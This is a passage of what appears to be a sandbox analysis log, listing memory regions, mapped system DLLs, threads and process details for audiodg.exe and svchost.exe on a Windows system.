monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 3161 start_va = 0x7fefd2f0000 end_va = 0x7fefd321fff monitored = 0 entry_point = 0x7fefd2f144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 3162 start_va = 0x28d0000 end_va = 0x28dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 3163 start_va = 0x74320000 end_va = 0x75675fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 3164 start_va = 0x28e0000 end_va = 0x28e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 3165 start_va = 0x28f0000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 3166 start_va = 0x28f0000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 3174 start_va = 0x28d0000 end_va = 0x28d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 3175 start_va = 0x28d0000 end_va = 0x28d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Thread: id = 315 os_tid = 0x360 Thread: id = 316 os_tid = 0x35c Thread: id = 317 os_tid = 0x354 Thread: id = 318 os_tid = 0x350 Thread: id = 319 os_tid = 0x348 Thread: id = 320 os_tid = 0x328 Thread: id = 321 os_tid = 0x2ec Thread: id = 322 os_tid = 0x2d4 Thread: id = 323 os_tid = 0x364 Process: id = "14" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x22be3000" os_pid = "0x37c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x2a0" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2b8" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ca7a" [0xc000000f], "LOCAL" [0x7] Region: id = 2716 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2717 start_va = 0xf0000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2718 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2719 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2720 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2721 start_va = 0xff8a0000 end_va = 0xff8c3fff monitored = 0 entry_point = 0xff8b69b4 region_type = mapped_file name = "audiodg.exe" filename = "\\Windows\\System32\\audiodg.exe" (normalized: "c:\\windows\\system32\\audiodg.exe") Region: id = 2722 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2723 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2724 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2725 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2726 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2727 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2728 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2729 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2730 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2731 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2732 start_va = 0x20000 end_va = 0x86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2734 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2735 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2736 start_va = 0x7fefc240000 end_va = 0x7fefc28afff monitored = 0 entry_point = 0x7fefc24efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2737 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2738 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2739 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2740 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2741 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2743 start_va = 0x7fefc110000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc1194bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2744 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2749 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2750 start_va = 0x350000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2751 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2752 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2756 start_va = 0x90000 end_va = 0xb8fff monitored = 0 entry_point = 0x91010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2757 start_va = 0x530000 end_va = 0x6b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2758 start_va = 0x90000 end_va = 0xb8fff monitored = 0 entry_point = 0x91010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2759 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2760 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2761 start_va = 0x170000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2762 start_va = 0x6c0000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2763 start_va = 0x90000 end_va = 0x90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "audiodg.exe.mui" filename = "\\Windows\\System32\\en-US\\audiodg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\audiodg.exe.mui") Region: id = 2766 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2767 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2768 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2769 start_va = 0x450000 end_va = 0x4ccfff monitored = 0 entry_point = 0x45cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2770 start_va = 0x450000 end_va = 0x4ccfff monitored = 0 entry_point = 0x45cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2771 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2772 start_va = 0x450000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2773 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2774 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2779 start_va = 0x7fefbe60000 end_va = 0x7fefbe8cfff monitored = 0 entry_point = 0x7fefbe61010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2780 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2782 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 2783 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2784 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2785 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2786 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2787 start_va = 0x4d0000 end_va = 0x514fff monitored = 0 entry_point = 0x4d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2790 start_va = 0x4d0000 end_va = 0x514fff monitored = 0 entry_point = 0x4d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2791 start_va = 0x4d0000 end_va = 0x514fff monitored = 0 entry_point = 0x4d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2792 start_va = 0x4d0000 end_va = 0x514fff monitored = 0 entry_point = 0x4d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2793 start_va = 0x4d0000 end_va = 0x514fff monitored = 0 entry_point = 0x4d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2794 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2795 start_va = 0xab0000 end_va = 0xd7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2797 start_va = 0xdd0000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 2798 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2799 start_va = 0x8b0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2800 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Thread: id = 329 os_tid = 0x380 Thread: id = 331 os_tid = 0x388 Thread: id = 333 os_tid = 0x390 Thread: id = 335 os_tid = 0x398 Thread: id = 336 os_tid = 0x39c Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x227bb000" os_pid = "0x3c4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f4b9" [0xc000000f], "LOCAL" [0x7] Region: id = 2866 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2867 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2868 start_va = 0x70000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2869 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2870 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2871 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2872 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2873 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2874 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2875 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2876 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2877 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2879 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2880 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2881 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2882 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2883 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2884 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2885 start_va = 0xf0000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2886 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2887 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2888 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2889 start_va = 0x2c0000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2890 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 2891 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2892 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2893 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2894 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2895 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2897 start_va = 0x160000 end_va = 0x188fff monitored = 0 entry_point = 0x161010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2898 start_va = 0x430000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2899 start_va = 0x160000 end_va = 0x188fff monitored = 0 entry_point = 0x161010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2900 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2901 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2902 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2903 start_va = 0x750000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2904 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2905 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2906 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2907 start_va = 0x810000 end_va = 0x88cfff monitored = 0 entry_point = 0x81cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2908 start_va = 0x810000 end_va = 0x88cfff monitored = 0 entry_point = 0x81cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2909 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2941 start_va = 0x930000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2942 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2943 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2944 start_va = 0x870000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2945 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2948 start_va = 0x9b0000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 2949 start_va = 0xbb0000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 2950 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2951 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2957 start_va = 0xc30000 end_va = 0xefefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2959 start_va = 0x7fefb3f0000 end_va = 0x7fefb456fff monitored = 0 entry_point = 0x7fefb406060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2972 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2973 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2974 start_va = 0x160000 end_va = 0x1a4fff monitored = 0 entry_point = 0x161064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2975 start_va = 0x160000 end_va = 0x1a4fff monitored = 0 entry_point = 0x161064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2976 